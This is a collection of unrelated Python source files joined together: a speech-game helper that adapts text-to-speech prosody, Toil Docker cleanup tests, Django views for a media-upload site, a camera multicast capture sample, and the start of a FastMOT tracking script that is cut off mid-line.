advice = random.choice(advice_prefixes) + advices_suffixes[self.last_advice]
logging.info('Helper=> [%(nombre)s] giving advice: %(advice)s', {'nombre': self.name, 'advice': advice})
invoke_tts(filename=self.game.get_response_filename(),
rate_change=self.calculate_percentage_rate(),
# range_change=self.calculate_percentage_range(),
energy_change=self.calculate_percentage_energy(),
f0mean_change=self.calculate_percentage_f0mean(),
pitch=self.pitch,
advice=advice) # RG
#mpatacchiola: calling the robot animation function
t = threading.Thread(target=robot_animation, args=(advice, self.name,))
t.start()
        #mpatacchiola: (sharedscreen) allows the movement of the robot head (it looks back at the screen)
direction = "screen"
sleep = 3.0 # adjust as you want
t = threading.Thread(target=robot_move_head, args=(direction, sleep, self.name,))
t.start()
pygame.mixer.music.play()
def calculate_percentage_rate(self):
if self.rate < 0:
return str(self.rate)+'%'
else:
return '+'+str(self.rate)+'%'
    # def calculate_percentage_range(self): # RG
    #     if self.pitch_range < 0:
    #         return str(self.pitch_range)+'%'
    #     else:
    #         return '+'+str(self.pitch_range)+'%'
def calculate_percentage_energy(self): # RG
if self.energy < 0:
return str(self.energy)+'%'
else:
return '+'+str(self.energy)+'%'
def calculate_percentage_f0mean(self): # RG
if self.f0mean < 0:
return str(self.f0mean)+'%'
else:
return '+'+str(self.f0mean)+'%'
def help(self):
nro = self.get_an_advice()
self.last_advice = nro
logging.info('Audio=> [%(nombre)s] giving advice: %(rank)02d', {'nombre': self.name, 'rank': nro})
self.speech_advice()
self.game.human_player.update_enabled_cards(nro)
return True
def choose_better_advs(self, keys):
score = keys[0]
for k in keys:
if abs(self.score + k) < abs(self.score + score):
score = k
return score
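    # Illustrative example (assumption): with self.score = 3 and keys = [-15, 1, 5],
    # choose_better_advs returns 1, the delta that keeps the running score closest to zero.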
def hide(self):
self.visible = False
def show(self):
self.visible = True
def is_talking(self):
return pygame.mixer.music.get_busy()
class PracticeHelper(Helper):
def __init__(self, id, game, initial_score=0):
super(PracticeHelper, self).__init__(id, game, initial_score)
def adapt_rates(self, new_ap_value, ap_feature): # RG
logging.info('Audio=> Practice helper does not adapt %s', ap_feature.upper()) # RG
if ap_feature == 'rate': # RG
self.game.historic_rate.append(new_ap_value)
# elif ap_feature == 'range':
# self.game.historic_range.append(new_ap_value)
elif ap_feature == 'energy':
self.game.historic_energy.append(new_ap_value)
elif ap_feature == 'f0mean':
self.game.historic_f0mean.append(new_ap_value)
pass
class EntrainingHelper(Helper):
def __init__(self, id, game, initial_score):
super(EntrainingHelper, self).__init__(id, game, initial_score)
self.initial_rate = game.rate_base
# self.initial_range = game.range_base # RG
self.initial_energy = game.energy_base # RG
self.initial_f0mean = game.f0mean_base # RG
def adapt_rates(self, new_ap_value, ap_feature): # RG
logging.info('Audio=> ## Adapting %s ## ', ap_feature.upper()) # RG
if ap_feature == 'rate': # RG
initial_ap = self.initial_rate
percentage_max = RATE_PERCENTAGE_MAX
percentage_min = RATE_PERCENTAGE_MIN
# elif ap_feature == 'range':
# initial_ap = self.initial_range
# percentage_max = RANGE_PERCENTAGE_MAX
# percentage_min = RANGE_PERCENTAGE_MIN
elif ap_feature == 'energy':
initial_ap = self.initial_energy
percentage_max = ENERGY_PERCENTAGE_MAX
percentage_min = ENERGY_PERCENTAGE_MIN
elif ap_feature == 'f0mean':
initial_ap = self.initial_f0mean
percentage_max = FOMEAN_PERCENTAGE_MAX
percentage_min = FOMEAN_PERCENTAGE_MIN
pt = (new_ap_value - initial_ap) / initial_ap
partial = int(round(pt, 2) * 100)
ap_change = max(min(partial, percentage_max), percentage_min) # RG
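        # Worked example (illustrative): with initial_ap = 180.0 and new_ap_value = 200.0,
        # pt = 0.111..., partial = int(round(pt, 2) * 100) = 11, and ap_change is then
        # clamped into [percentage_min, percentage_max] (e.g. +/-25 for 'rate').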
if ap_feature == 'rate': # RG
self.game.historic_rate.append(new_ap_value)
self.rate = ap_change
# elif ap_feature == 'range':
# self.game.historic_range.append(new_ap_value)
# self.pitch_range = ap_change
elif ap_feature == 'energy':
self.game.historic_energy.append(new_ap_value)
self.energy = ap_change
elif ap_feature == 'f0mean':
self.game.historic_f0mean.append(new_ap_value)
self.f0mean = ap_change
logging.info('Audio=> Measured %(ap_feature)s: [%(new_ap_value)g] - Change: [%(percent_change)g percent] - Base value: [%(base_value)g]',
{'ap_feature': ap_feature, 'new_ap_value': new_ap_value, 'percent_change': ap_change, 'base_value': initial_ap}) # RG
class DisentrainingHelper(Helper):
def __init__(self, id, game, initial_score):
super(DisentrainingHelper, self).__init__(id, game, initial_score)
self.initial_rate = game.rate_base
# self.initial_range = game.range_base # RG
self.initial_energy = game.energy_base # RG
self.initial_f0mean = game.f0mean_base # RG
def adapt_rates(self, new_ap_value, ap_feature): # RG
logging.info('Audio=> ## DE-Adapting %s ## ', ap_feature.upper()) # RG
if ap_feature == 'rate': # RG
initial_ap = self.initial_rate
percentage_max = RATE_PERCENTAGE_MAX
percentage_min = RATE_PERCENTAGE_MIN
# elif ap_feature == 'range':
# initial_ap = self.initial_range
# percentage_max = RANGE_PERCENTAGE_MAX
# percentage_min = RANGE_PERCENTAGE_MIN
elif ap_feature == 'energy':
initial_ap = self.initial_energy
percentage_max = ENERGY_PERCENTAGE_MAX
percentage_min = ENERGY_PERCENTAGE_MIN
elif ap_feature == 'f0mean':
initial_ap = self.initial_f0mean
percentage_max = FOMEAN_PERCENTAGE_MAX
percentage_min = FOMEAN_PERCENTAGE_MIN
pt = (new_ap_value - initial_ap) / initial_ap
partial = int(round(pt, 2) * -100) # RG: this must be one of the most important minus signs in science! And it's well hidden!
ap_change = max(min(partial, percentage_max), percentage_min) # RG
if ap_feature == 'rate': # RG
self.game.historic_rate.append(new_ap_value)
self.rate = ap_change
# elif ap_feature == 'range':
# self.game.historic_range.append(new_ap_value)
# self.pitch_range = ap_change
elif ap_feature == 'energy':
self.game.historic_energy.append(new_ap_value)
self.energy = ap_change
elif ap_feature == 'f0mean':
self.game.historic_f0mean.append(new_ap_value)
self.f0mean = ap_change
logging.info('Audio=> Measured %(ap_feature)s: [%(new_ap_value)g] - Change: [%(percent_change)g percent] - Base value: [%(base_value)g]',
{'ap_feature': ap_feature, 'new_ap_value': new_ap_value, 'percent_change': ap_change, 'base_value': initial_ap}) # RG
class UnknownHelper(Helper):
def __init__(self, id, game):
super(UnknownHelper, self).__init__(id, game)
self.image = HelperUnknownSignal(game.helper_names)
self.clock = None
def help(self):
self.clock = time.time()
return False
def adapt_rates(self, new_ap_value, ap_feature):
logging.error('Audio=> Not adapting %(ap_feature)s because the helper is %(helper_name)s',
{'helper_name': self.name, 'ap_feature': ap_feature})
def is_talking(self):
return time.time() - self.clock < 3
|
dockerTest.py
|
# Copyright (C) 2015-2020 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import signal
import time
import os
import sys
import uuid
import docker
from threading import Thread
from docker.errors import ContainerError
from toil.job import Job
from toil.leader import FailedJobsException
from toil.test import ToilTest, slow, needs_docker
from toil.lib.docker import apiDockerCall, containerIsRunning, dockerKill
from toil.lib.docker import FORGO, STOP, RM
logger = logging.getLogger(__name__)
@needs_docker
class DockerTest(ToilTest):
"""
Tests dockerCall and ensures no containers are left around.
    When running tests you may optionally set the TOIL_TEST_TEMP environment
    variable to the path of a directory where you want temporary test files to be
    placed. The directory will be created if it doesn't exist. The path may be
    relative, in which case it will be assumed to be relative to the project
    root. If TOIL_TEST_TEMP is not defined, temporary files and directories will
    be created in the system's default location for such files, and any temporary
    files or directories left over from tests will be removed automatically
    during tear down. Otherwise, left-over files will not be removed.
"""
def setUp(self):
self.tempDir = self._createTempDir(purpose='tempDir')
self.dockerTestLogLevel = 'INFO'
def testDockerClean(self,
disableCaching=True,
detached=True,
rm=True,
deferParam=None):
"""
Run the test container that creates a file in the work dir, and sleeps
for 5 minutes.
Ensure that the calling job gets SIGKILLed after a minute, leaving
behind the spooky/ghost/zombie container. Ensure that the container is
killed on batch system shutdown (through the deferParam mechanism).
"""
# We need to test the behaviour of `deferParam` with `rm` and
# `detached`. We do not look at the case where `rm` and `detached` are
# both True. This is the truth table for the different combinations at
# the end of the test. R = Running, X = Does not exist, E = Exists but
# not running.
# None FORGO STOP RM
# rm X R X X
# detached R R E X
# Neither R R E X
data_dir = os.path.join(self.tempDir, 'data')
working_dir = os.path.join(self.tempDir, 'working')
test_file = os.path.join(working_dir, 'test.txt')
os.makedirs(data_dir, exist_ok=True)
os.makedirs(working_dir, exist_ok=True)
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir,
'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = working_dir
options.clean = 'always'
options.disableCaching = disableCaching
# No base64 logic since it might create a name starting with a `-`.
container_name = uuid.uuid4().hex
A = Job.wrapJobFn(_testDockerCleanFn,
working_dir,
detached,
rm,
deferParam,
container_name)
try:
Job.Runner.startToil(A, options)
except FailedJobsException:
# The file created by spooky_container would remain in the directory
# and since it was created inside the container, it would have had
# uid and gid == 0 (root) which may cause problems when docker
# attempts to clean up the jobstore.
file_stats = os.stat(test_file)
assert file_stats.st_gid != 0
assert file_stats.st_uid != 0
if (rm and (deferParam != FORGO)) or deferParam == RM:
# These containers should not exist
assert containerIsRunning(container_name) is None, \
'Container was not removed.'
elif deferParam == STOP:
# These containers should exist but be non-running
assert containerIsRunning(container_name) == False, \
'Container was not stopped.'
else:
# These containers will be running
assert containerIsRunning(container_name) == True, \
'Container was not running.'
client = docker.from_env(version='auto')
dockerKill(container_name, client)
try:
os.remove(test_file)
except:
pass
def testDockerClean_CRx_FORGO(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=FORGO)
def testDockerClean_CRx_STOP(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=STOP)
def testDockerClean_CRx_RM(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=RM)
@slow
def testDockerClean_CRx_None(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=None)
@slow
def testDockerClean_CxD_FORGO(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_CxD_STOP(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=STOP)
@slow
def testDockerClean_CxD_RM(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=RM)
@slow
def testDockerClean_CxD_None(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=None)
@slow
def testDockerClean_Cxx_FORGO(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_Cxx_STOP(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=STOP)
@slow
def testDockerClean_Cxx_RM(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=RM)
@slow
def testDockerClean_Cxx_None(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=None)
@slow
def testDockerClean_xRx_FORGO(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=FORGO)
@slow
def testDockerClean_xRx_STOP(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=STOP)
@slow
def testDockerClean_xRx_RM(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=RM)
@slow
def testDockerClean_xRx_None(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=None)
@slow
def testDockerClean_xxD_FORGO(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_xxD_STOP(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=STOP)
@slow
def testDockerClean_xxD_RM(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=RM)
@slow
def testDockerClean_xxD_None(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=None)
@slow
def testDockerClean_xxx_FORGO(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_xxx_STOP(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=STOP)
@slow
def testDockerClean_xxx_RM(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=RM)
@slow
def testDockerClean_xxx_None(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=None)
def testDockerPipeChain(self, disableCaching=True):
"""
        Test for the piping API for dockerCall(). Using this API (activated when
        a list of argument lists is given as parameters), commands are piped
        together into a chain.
ex: parameters=[ ['printf', 'x\n y\n'], ['wc', '-l'] ] should execute:
printf 'x\n y\n' | wc -l
"""
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir, 'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = self.tempDir
options.clean = 'always'
options.caching = disableCaching
A = Job.wrapJobFn(_testDockerPipeChainFn)
rv = Job.Runner.startToil(A, options)
logger.info('Container pipeline result: %s', repr(rv))
if sys.version_info >= (3, 0):
rv = rv.decode('utf-8')
assert rv.strip() == '2'
def testDockerPipeChainErrorDetection(self, disableCaching=True):
"""
        By default, executing cmd1 | cmd2 | ... | cmdN will only return an
        error if cmdN fails. This can lead to all manner of errors being
silently missed. This tests to make sure that the piping API for
dockerCall() throws an exception if non-last commands in the chain fail.
"""
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir,
'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = self.tempDir
options.clean = 'always'
options.caching = disableCaching
A = Job.wrapJobFn(_testDockerPipeChainErrorFn)
rv = Job.Runner.startToil(A, options)
assert rv == True
def testNonCachingDockerChain(self):
self.testDockerPipeChain(disableCaching=False)
def testNonCachingDockerChainErrorDetection(self):
self.testDockerPipeChainErrorDetection(disableCaching=False)
def testDockerLogs(self, stream=False, demux=False):
"""Test for the different log outputs when deatch=False."""
working_dir = os.path.join(self.tempDir, 'working')
script_file = os.path.join(working_dir, 'script.sh')
os.makedirs(working_dir, exist_ok=True)
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir, 'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = working_dir
options.clean = 'always'
A = Job.wrapJobFn(_testDockerLogsFn,
working_dir=working_dir,
script_file=script_file,
stream=stream,
demux=demux)
try:
rv = Job.Runner.startToil(A, options)
assert rv == True
finally:
try:
os.remove(script_file)
except:
pass
def testDockerLogs_Stream(self):
self.testDockerLogs(stream=True, demux=False)
def testDockerLogs_Demux(self):
self.testDockerLogs(stream=False, demux=True)
def testDockerLogs_Demux_Stream(self):
self.testDockerLogs(stream=True, demux=True)
def _testDockerCleanFn(job,
working_dir,
detached=None,
rm=None,
deferParam=None,
containerName=None):
"""
Test function for test docker_clean. Runs a container with given flags and
then dies leaving behind a zombie container.
:param toil.job.Job job: job
:param working_dir: See `work_dir=` in :func:`dockerCall`
:param bool rm: See `rm=` in :func:`dockerCall`
:param bool detached: See `detached=` in :func:`dockerCall`
:param int deferParam: See `deferParam=` in :func:`dockerCall`
:param str containerName: See `container_name=` in :func:`dockerCall`
"""
def killSelf():
test_file = os.path.join(working_dir, 'test.txt')
# Kill the worker once we are sure the docker container is started
while not os.path.exists(test_file):
logger.debug('Waiting on the file created by spooky_container.')
time.sleep(1)
# By the time we reach here, we are sure the container is running.
time.sleep(1)
os.kill(os.getpid(), signal.SIGKILL)
t = Thread(target=killSelf)
# Make it a daemon thread so that thread failure doesn't hang tests.
t.daemon = True
t.start()
apiDockerCall(job,
image='quay.io/ucsc_cgl/spooky_test',
working_dir=working_dir,
deferParam=deferParam,
containerName=containerName,
detach=detached,
remove=rm,
privileged=True)
def _testDockerPipeChainFn(job):
"""Return the result of a simple pipe chain. Should be 2."""
parameters = [['printf', 'x\n y\n'], ['wc', '-l']]
return apiDockerCall(job,
image='ubuntu:latest',
parameters=parameters,
privileged=True)
def _testDockerPipeChainErrorFn(job):
"""Return True if the command exit 1 | wc -l raises a ContainerError."""
parameters = [['exit', '1'], ['wc', '-l']]
try:
apiDockerCall(job,
image='quay.io/ucsc_cgl/spooky_test',
parameters=parameters)
except ContainerError:
return True
return False
def _testDockerLogsFn(job,
working_dir,
script_file,
stream=False,
demux=False):
"""Return True if the test succeeds. Otherwise Exception is raised."""
# we write a script file because the redirection operator, '>&2', is wrapped
# in quotes when passed as parameters.
import textwrap
bash_script = textwrap.dedent('''
#!/bin/bash
echo hello stdout ;
echo hello stderr >&2 ;
echo hello stdout ;
echo hello stderr >&2 ;
echo hello stdout ;
echo hello stdout ;
''')
with open(script_file, 'w') as file:
file.write(bash_script)
out = apiDockerCall(job,
image='ubuntu:latest',
working_dir=working_dir,
parameters=[script_file],
volumes={working_dir: {'bind': working_dir, 'mode': 'rw'}},
entrypoint="/bin/bash",
stdout=True,
stderr=True,
stream=stream,
demux=demux)
# we check the output length because order is not guaranteed.
if stream:
if demux:
# a generator with tuples of (stdout, stderr)
assert hasattr(out, '__iter__')
for _ in range(6):
stdout, stderr = next(out)
if stdout:
# len('hello stdout\n') == 13
assert len(stdout) == 13
elif stderr:
assert len(stderr) == 13
else:
assert False
else:
# a generator with bytes
assert hasattr(out, '__iter__')
for _ in range(6):
assert len(next(out)) == 13
else:
if demux:
# a tuple of (stdout, stderr)
stdout, stderr = out
# len('hello stdout\n' * 4) == 52
assert len(stdout) == 52
# len('hello stderr\n' * 2) == 26
assert len(stderr) == 26
else:
# a bytes object
# len('hello stdout\n' * 4 + 'hello stderr\n' * 2) == 78
assert len(out) == 78
return True
|
views.py
|
import os
from threading import Thread
from tempfile import gettempdir
from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.password_validation import validate_password, ValidationError
from django.http import HttpResponse
from django.contrib import messages
from .forms import LoginForm, SongUpload
from .models import Song
from .videoutils import hlsify, loadkey
def index(request):
return render(request, "index.html", {"username": request.user.get_username()})
def mymedia(request):
if request.user.is_authenticated:
return render(request, "mymedia.html", {"media": Song.objects.all().filter(uploader=request.user)})
else:
messages.error(request, "you are not logged in")
return redirect("/login/")
def medialist(request):
return render(request, "medialist.html", {"media": Song.objects.all().filter(privacy="public")})
@csrf_protect
def loginpage(request):
if request.method == "GET":
return render(request, "form.html", {"form": LoginForm(),
"destination": "/login/",
"action": "Login",
"title": "Login"})
elif request.method == "POST":
loginform = LoginForm(request.POST)
if not loginform.is_valid():
messages.error(request, "login form invalid")
return redirect("/login/")
formdata = loginform.cleaned_data
user = authenticate(request, username=formdata["username"], password=formdata["password"])
if not user is None:
login(request, user)
messages.success(request, "you have successfully logged in!")
return redirect("/")
else:
messages.error(request, "authentication failed")
return redirect("/login/")
else:
return HttpResponse(status=405)
def logoutuser(request):
logout(request)
messages.success(request, "successfully logged out")
return redirect("/")
@csrf_protect
def passwordchange(request):
user = request.user
if user.is_authenticated:
if request.method == "GET":
return render(request, "passwordreset.html")
elif request.method == "POST":
if not user.check_password(request.POST["oldpassword"]):
messages.error(request, "old password incorrect")
return redirect("/resetpassword/")
password = request.POST["password"]
try:
validate_password(password)
except ValidationError as errors:
for error in errors:
messages.error(request, error)
return redirect("/resetpassword/")
user.set_password(password)
user.save()
messages.success(request, "password changed")
return redirect("/")
else:
return HttpResponse(status=405)
else:
messages.error(request, "you are not logged in")
return redirect("/login/")
@csrf_protect
def uploadpage(request):
user = request.user
if not user.is_authenticated:
messages.error(request, "you are not logged in")
return redirect("/login/")
if request.method == "GET":
return render(request, "form.html", {"form": SongUpload,
"destination": "/upload/",
"action": "Upload",
"title": "Upload Media",
"fileupload": True})
elif request.method == "POST":
if not user.is_superuser and len(Song.objects.all().filter(uploader=user)) >= 5:
messages.error(request, "storage limit exceeded, delete your old media")
return redirect("/mymedia/")
uploadform = SongUpload(request.POST)
if uploadform.is_valid():
title = uploadform.cleaned_data["title"]
templocation = os.path.join(gettempdir(), title + ".media")
f = open(templocation, "wb+")
for chunk in request.FILES["mediafile"]:
f.write(chunk)
f.close()
data = uploadform.save(commit=False)
data.uploader = user
data.save()
t = Thread(target=hlsify, args=(title, templocation))
t.start()
messages.success(request, "media successfully uploaded")
return redirect("/mymedia/")
messages.error(request, "upload form invalid")
return redirect("/")
else:
return HttpResponse(status=405)
def player(request):
video = request.session.get("video", True)
return render(request, "player.html", {"video": video})
def getkey(request):
requested = request.GET["media"]
media = get_object_or_404(Song, title=requested)
if not media.privacy == "private":
return HttpResponse(loadkey(requested), content_type="application/octet-stream")
if request.user.is_authenticated:
if media.uploader == request.user:
return HttpResponse(loadkey(requested), content_type="application/octet-stream")
else:
return HttpResponse(status=401)
else:
return HttpResponse(status=403)
@csrf_protect
def edit(request):
if not request.user.is_authenticated:
return HttpResponse(status=403)
media = get_object_or_404(Song, title=request.GET.get("media"))
if not media.uploader == request.user:
return HttpResponse(status=401)
if request.method == "GET":
return render(request, "edit.html", {"media": media})
elif request.method == "POST":
if request.POST.get("delete") == "true":
media.delete()
messages.success(request, "deleted successfully")
return redirect("/mymedia/")
try:
newprivacy = request.POST["privacy"]
except KeyError:
return HttpResponse(status=400)
media.privacy = newprivacy
media.save()
messages.success(request, "edited successfully")
return redirect("/mymedia/")
else:
return HttpResponse(status=405)
def togglemode(request):
currentmode = request.session.get("video", True)
request.session["video"] = not currentmode
return redirect("/")
|
MultiCast.py
|
# -*- coding: utf-8 -*-
import os  # needed by press_any_key_exit()
import sys
import threading
import termios
from ctypes import *
sys.path.append("../MvImport")
from MvCameraControl_class import *
g_bExit = False
# Worker thread: grab frames from the camera until g_bExit is set
def work_thread(cam=0, pData=0, nDataSize=0):
stFrameInfo = MV_FRAME_OUT_INFO_EX()
memset(byref(stFrameInfo), 0, sizeof(stFrameInfo))
while True:
ret = cam.MV_CC_GetOneFrameTimeout(pData, nDataSize, stFrameInfo, 1000)
if ret == 0:
print ("get one frame: Width[%d], Height[%d], nFrameNum[%d]" % (stFrameInfo.nWidth, stFrameInfo.nHeight, stFrameInfo.nFrameNum))
else:
print ("no data[0x%x]" % ret)
if g_bExit == True:
break
def press_any_key_exit():
fd = sys.stdin.fileno()
old_ttyinfo = termios.tcgetattr(fd)
new_ttyinfo = old_ttyinfo[:]
new_ttyinfo[3] &= ~termios.ICANON
new_ttyinfo[3] &= ~termios.ECHO
#sys.stdout.write(msg)
#sys.stdout.flush()
termios.tcsetattr(fd, termios.TCSANOW, new_ttyinfo)
try:
os.read(fd, 7)
except:
pass
finally:
termios.tcsetattr(fd, termios.TCSANOW, old_ttyinfo)
if __name__ == "__main__":
deviceList = MV_CC_DEVICE_INFO_LIST()
tlayerType = MV_GIGE_DEVICE | MV_USB_DEVICE
    # Enumerate devices
ret = MvCamera.MV_CC_EnumDevices(tlayerType, deviceList)
if ret != 0:
print ("enum devices fail! ret[0x%x]" % ret)
sys.exit()
if deviceList.nDeviceNum == 0:
print ("find no device!")
sys.exit()
print ("find %d devices!" % deviceList.nDeviceNum)
for i in range(0, deviceList.nDeviceNum):
mvcc_dev_info = cast(deviceList.pDeviceInfo[i], POINTER(MV_CC_DEVICE_INFO)).contents
if mvcc_dev_info.nTLayerType == MV_GIGE_DEVICE:
print ("\ngige device: [%d]" % i)
strModeName = ""
for per in mvcc_dev_info.SpecialInfo.stGigEInfo.chModelName:
strModeName = strModeName + chr(per)
print ("device model name: %s" % strModeName)
nip1 = ((mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0xff000000) >> 24)
nip2 = ((mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0x00ff0000) >> 16)
nip3 = ((mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0x0000ff00) >> 8)
nip4 = (mvcc_dev_info.SpecialInfo.stGigEInfo.nCurrentIp & 0x000000ff)
print ("current ip: %d.%d.%d.%d\n" % (nip1, nip2, nip3, nip4))
elif mvcc_dev_info.nTLayerType == MV_USB_DEVICE:
print ("\nu3v device: [%d]" % i)
strModeName = ""
for per in mvcc_dev_info.SpecialInfo.stUsb3VInfo.chModelName:
if per == 0:
break
strModeName = strModeName + chr(per)
print ("device model name: %s" % strModeName)
strSerialNumber = ""
for per in mvcc_dev_info.SpecialInfo.stUsb3VInfo.chSerialNumber:
if per == 0:
break
strSerialNumber = strSerialNumber + chr(per)
print ("user serial number: %s" % strSerialNumber)
nConnectionNum = input("please input the number of the device to connect:")
if int(nConnectionNum) >= deviceList.nDeviceNum:
print ("intput error!")
sys.exit()
    # Create camera instance
cam = MvCamera()
    # Select device and create handle
stDeviceList = cast(deviceList.pDeviceInfo[int(nConnectionNum)], POINTER(MV_CC_DEVICE_INFO)).contents
ret = cam.MV_CC_CreateHandle(stDeviceList)
if ret != 0:
print ("create handle fail! ret[0x%x]" % ret)
sys.exit()
    # Ask the user to launch either the multicast controlling application
    # or the multicast monitoring application.
    key = raw_input("start multicast sample in (c)ontrol or in (m)onitor mode? (c/m): ")
    # Query the user for the mode to use.
monitor = False
if key == 'm' or key == 'M':
monitor = True
elif key == 'c' or key == 'C':
monitor = False
else:
print ("intput error!")
sys.exit()
if monitor:
ret = cam.MV_CC_OpenDevice(MV_ACCESS_Monitor, 0)
if ret != 0:
print ("open device fail! ret[0x%x]" % ret)
sys.exit()
else:
ret = cam.MV_CC_OpenDevice(MV_ACCESS_Control, 0)
if ret != 0:
print ("open device fail! ret[0x%x]" % ret)
sys.exit()
    # Detect the optimal network packet size (only works for GigE cameras)
if stDeviceList.nTLayerType == MV_GIGE_DEVICE:
nPacketSize = cam.MV_CC_GetOptimalPacketSize()
if int(nPacketSize) > 0:
ret = cam.MV_CC_SetIntValue("GevSCPSPacketSize",nPacketSize)
if ret != 0:
print ("Warning: Set Packet Size fail! ret[0x%x]" % ret)
else:
print ("Warning: Get Packet Size fail! ret[0x%x]" % nPacketSize)
    # Get payload size
stParam = MVCC_INTVALUE()
memset(byref(stParam), 0, sizeof(MVCC_INTVALUE))
ret = cam.MV_CC_GetIntValue("PayloadSize", stParam)
if ret != 0:
print ("get payload size fail! ret[0x%x]" % ret)
sys.exit()
nPayloadSize = stParam.nCurValue
    # Specify the multicast IP
strIp = "239.192.1.1"
device_ip_list = strIp.split('.')
dest_ip = (int(device_ip_list[0]) << 24) | (int(device_ip_list[1]) << 16) | (int(device_ip_list[2]) << 8) | int(device_ip_list[3])
print ("dest ip: %s" % strIp)
    # A port number can be specified for the multicast group
stTransmissionType = MV_TRANSMISSION_TYPE()
memset(byref(stTransmissionType), 0, sizeof(MV_TRANSMISSION_TYPE))
stTransmissionType.enTransmissionType = MV_GIGE_TRANSTYPE_MULTICAST
stTransmissionType.nDestIp = dest_ip
stTransmissionType.nDestPort = 1042
ret = cam.MV_GIGE_SetTransmissionType(stTransmissionType)
if MV_OK != ret:
print ("set transmission type fail! ret [0x%x]" % ret)
    # Start grabbing images
ret = cam.MV_CC_StartGrabbing()
if ret != 0:
print ("start grabbing fail! ret[0x%x]" % ret)
sys.exit()
data_buf = (c_ubyte * nPayloadSize)()
try:
hThreadHandle = threading.Thread(target=work_thread, args=(cam, byref(data_buf), nPayloadSize))
hThreadHandle.start()
except:
print ("error: unable to start thread")
print ("press a key to stop grabbing.")
press_any_key_exit()
g_bExit = True
hThreadHandle.join()
    # Stop grabbing images
ret = cam.MV_CC_StopGrabbing()
if ret != 0:
print ("stop grabbing fail! ret[0x%x]" % ret)
del data_buf
sys.exit()
    # Close device
ret = cam.MV_CC_CloseDevice()
if ret != 0:
print ("close deivce fail! ret[0x%x]" % ret)
del data_buf
sys.exit()
    # Destroy handle
ret = cam.MV_CC_DestroyHandle()
if ret != 0:
print ("destroy handle fail! ret[0x%x]" % ret)
del data_buf
sys.exit()
del data_buf
|
app.py
|
#!/usr/bin/env python3
from pathlib import Path
from types import SimpleNamespace
import argparse
import logging
import json
import cv2
import fastmot
import fastmot.models
from fastmot.utils import ConfigDecoder, Profiler
def motcount(inputurl, count_global, process_number):
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
optional = parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
group = parser.add_mutually_exclusive_group()
"""
required.add_argument('-i', '--input-uri', metavar="URI", required=True, help=
'URI to input stream\n'
'1) image sequence (e.g. %%06d.jpg)\n'
'2) video file (e.g. file.mp4)\n'
'3) MIPI CSI camera (e.g. csi://0)\n'
'4) USB camera (e.g. /dev/video0)\n'
'5) RTSP stream (e.g. rtsp://<user>:<password>@<ip>:<port>/<path>)\n'
'6) HTTP stream (e.g. http://<user>:<password>@<ip>:<port>/<path>)\n')
"""
optional.add_argument('-c', '--config', metavar="FILE",
default=Path(__file__).parent / 'cfg' / 'mot.json',
help='path to JSON configuration file')
optional.add_argument('-l', '--labels', metavar="FILE",
help='path to label names (e.g. coco.names)')
optional.add_argument('-o', '--output-uri', metavar="URI",
help='URI to output video file')
optional.add_argument('-t', '--txt', metavar="FILE",
help='path to output MOT Challenge format results (e.g. MOT20-01.txt)')
optional.add_argument('-m', '--mot', action='store_true', help='run multiple object tracker')
optional.add_argument('-s', '--show', action='store_true', help='show visualizations')
group.add_argument('-q', '--quiet', action='store_true', help='reduce output verbosity')
group.add_argument('-v', '--verbose', action='store_true', help='increase output verbosity')
parser._action_groups.append(optional)
args = parser.parse_args()
args.mot=True
args.show=True
args.config='/home/geodrones/Documents/FastMOT/cfg/nano_v4tinyCH_fastobj.json'
args.input_uri = inputurl
if args.txt is not None and not args.mot:
